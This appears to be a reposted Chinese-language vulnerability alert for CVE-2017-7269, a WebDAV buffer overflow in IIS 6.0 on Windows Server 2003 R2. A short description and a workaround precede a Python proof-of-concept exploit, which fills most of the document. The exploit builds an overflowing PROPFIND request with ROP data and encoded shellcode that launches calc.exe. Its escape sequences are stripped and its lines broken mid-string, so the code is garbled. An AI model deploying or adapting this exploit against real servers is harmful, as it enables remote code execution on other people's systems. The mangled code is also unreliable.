漏洞描述

微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PROPFIND请求,执行任意代码。该漏洞自2016年7、8月起就已被利用。

由于开启WebDAV服务就存在该漏洞,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

【漏洞预警】IIS 6.0曝远程代码执行漏洞CVE-2017-7269-RadeBit瑞安全

漏洞编号

CVE-2017-7269

其他信息

ScStoragePathFromUrl函数被调用两次

影响版本

Windows Server 2003 R2

攻击向量

修改过的PROFIND数据

漏洞发现者

Zhiniang Peng和Chen Wu(华南理工大学计算机科学与工程学院信息安全实验室)

PoC

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.

#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China

#-----------Email: edwardz@foxmail.com

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.connect(('127.0.0.1',80))

pay='PROPFIND / HTTP/1.1rnHost: localhostrnContent-Length: 0rn'

pay+='If: <http://localhost/aaaaaaa'

pay+='xe6xbdxa8xe7xa1xa3xe7x9dxa1xe7x84xb3xe6

xa4xb6xe4x9dxb2xe7xa8xb9xe4xadxb7xe4xbdxb0xe

7x95x93xe7xa9x8fxe4xa1xa8xe5x99xa3xe6xb5x94x

e6xa1x85xe3xa5x93xe5x81xacxe5x95xa7xe6x9dxa3

xe3x8dxa4xe4x98xb0xe7xa1x85xe6xa5x92xe5x90xb

1xe4xb1x98xe6xa9x91xe7x89x81xe4x88xb1xe7x80x

b5xe5xa1x90xe3x99xa4xe6xb1x87xe3x94xb9xe5x91

xaaxe5x80xb4xe5x91x83xe7x9dx92xe5x81xa1xe3x88

xb2xe6xb5x8bxe6xb0xb4xe3x89x87xe6x89x81xe3x9

dx8dxe5x85xa1xe5xa1xa2xe4x9dxb3xe5x89x90xe3x

99xb0xe7x95x84xe6xa1xaaxe3x8dxb4xe4xb9x8axe7

xa1xabxe4xa5xb6xe4xb9xb3xe4xb1xaaxe5x9dxbaxe6

xbdxb1xe5xa1x8axe3x88xb0xe3x9dxaexe4xadx89xe5

x89x8dxe4xa1xa3xe6xbdx8cxe7x95x96xe7x95xb5xe6

x99xafxe7x99xa8xe4x91x8dxe5x81xb0xe7xa8xb6xe6

x89x8bxe6x95x97xe7x95x90xe6xa9xb2xe7xa9xabxe7

x9dxa2xe7x99x98xe6x89x88xe6x94xb1xe3x81x94xe6

xb1xb9xe5x81x8axe5x91xa2xe5x80xb3xe3x95xb7xe6

xa9xb7xe4x85x84xe3x8cxb4xe6x91xb6xe4xb5x86xe5

x99x94xe4x9dxacxe6x95x83xe7x98xb2xe7x89xb8xe5

x9dxa9xe4x8cxb8xe6x89xb2xe5xa8xb0xe5xa4xb8xe5

x91x88xc8x82xc8x82xe1x8bx80xe6xa0x83xe6xb1x84

xe5x89x96xe4xacxb7xe6xb1xadxe4xbdx98xe5xa1x9a

xe7xa5x90xe4xa5xaaxe5xa1x8fxe4xa9x92xe4x85x90

xe6x99x8dxe1x8fx80xe6xa0x83xe4xa0xb4xe6x94xb1

xe6xbdx83xe6xb9xa6xe7x91x81xe4x8dxacxe1x8fx80

xe6xa0x83xe5x8dx83xe6xa9x81xe7x81x92xe3x8cxb0

xe5xa1xa6xe4x89x8cxe7x81x8bxe6x8dx86xe5x85xb3

xe7xa5x81xe7xa9x90xe4xa9xac'

pay+='>'

pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'

pay+='xe7xa5x88xe6x85xb5xe4xbdx83xe6xbdxa7xe6x

adxafxe4xa1x85xe3x99x86xe6x9dxb5xe4x90xb3xe3x

a1xb1xe5x9dxa5xe5xa9xa2xe5x90xb5xe5x99xa1xe6x

a5x92xe6xa9x93xe5x85x97xe3xa1x8exe5xa5x88xe6x

8dx95xe4xa5xb1xe4x8dxa4xe6x91xb2xe3x91xa8xe4x

9dx98xe7x85xb9xe3x8dxabxe6xadx95xe6xb5x88xe5x

81x8fxe7xa9x86xe3x91xb1xe6xbdx94xe7x91x83xe5xa

5x96xe6xbdxafxe7x8dx81xe3x91x97xe6x85xa8xe7xa9

xb2xe3x9dx85xe4xb5x89xe5x9dx8exe5x91x88xe4xb0

xb8xe3x99xbaxe3x95xb2xe6x89xa6xe6xb9x83xe4xa1

xadxe3x95x88xe6x85xb7xe4xb5x9axe6x85xb4xe4x84

xb3xe4x8dxa5xe5x89xb2xe6xb5xa9xe3x99xb1xe4xb9

xa4xe6xb8xb9xe6x8dx93xe6xadxa4xe5x85x86xe4xbc

xb0xe7xa1xafxe7x89x93xe6x9dx90xe4x95x93xe7xa9

xa3xe7x84xb9xe4xbdx93xe4x91x96xe6xbcxb6xe7x8d

xb9xe6xa1xb7xe7xa9x96xe6x85x8axe3xa5x85xe3x98

xb9xe6xb0xb9xe4x94xb1xe3x91xb2xe5x8dxa5xe5xa1

x8axe4x91x8exe7xa9x84xe6xb0xb5xe5xa9x96xe6x89

x81xe6xb9xb2xe6x98xb1xe5xa5x99xe5x90xb3xe3x85

x82xe5xa1xa5xe5xa5x81xe7x85x90xe3x80xb6xe5x9d

xb7xe4x91x97xe5x8dxa1xe1x8fx80xe6xa0x83xe6xb9

x8fxe6xa0x80xe6xb9x8fxe6xa0x80xe4x89x87xe7x99x

aaxe1x8fx80xe6xa0x83xe4x89x97xe4xbdxb4xe5xa5x8

7xe5x88xb4xe4xadxa6xe4xadx82xe7x91xa4xe7xa1xaf

xe6x82x82xe6xa0x81xe5x84xb5xe7x89xbaxe7x91xbax

e4xb5x87xe4x91x99xe5x9dx97xebx84x93xe6xa0x80xe

3x85xb6xe6xb9xafxe2x93xa3xe6xa0x81xe1x91xa0xe6

xa0x83xccx80xe7xbfxbexefxbfxbfxefxbfxbfxe1x8fx80x

e6xa0x83xd1xaexe6xa0x83xe7x85xaexe7x91xb0xe1x90

xb4xe6xa0x83xe2xa7xa7xe6xa0x81xe9x8ex91xe6xa0x

80xe3xa4xb1xe6x99xaexe4xa5x95xe3x81x92xe5x91xab

xe7x99xabxe7x89x8axe7xa5xa1xe1x90x9cxe6xa0x83x

e6xb8x85xe6xa0x80xe7x9cxb2xe7xa5xa8xe4xb5xa9xe3

x99xacxe4x91xa8xe4xb5xb0xe8x89x86xe6xa0x80xe4x

a1xb7xe3x89x93xe1xb6xaaxe6xa0x82xe6xbdxaaxe4x8c

xb5xe1x8fxb8xe6xa0x83xe2xa7xa7xe6xa0x81'

shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAI

AQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI11

11AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJ

T1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5Z

NL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP

1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X

06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ

3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4

U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ

1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YM

W5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJ

MJS8KJNKPA'

pay+=shellcode

pay+='>rnrn'

print pay

sock.send(pay)

data = sock.recv(80960)

print data

sock.close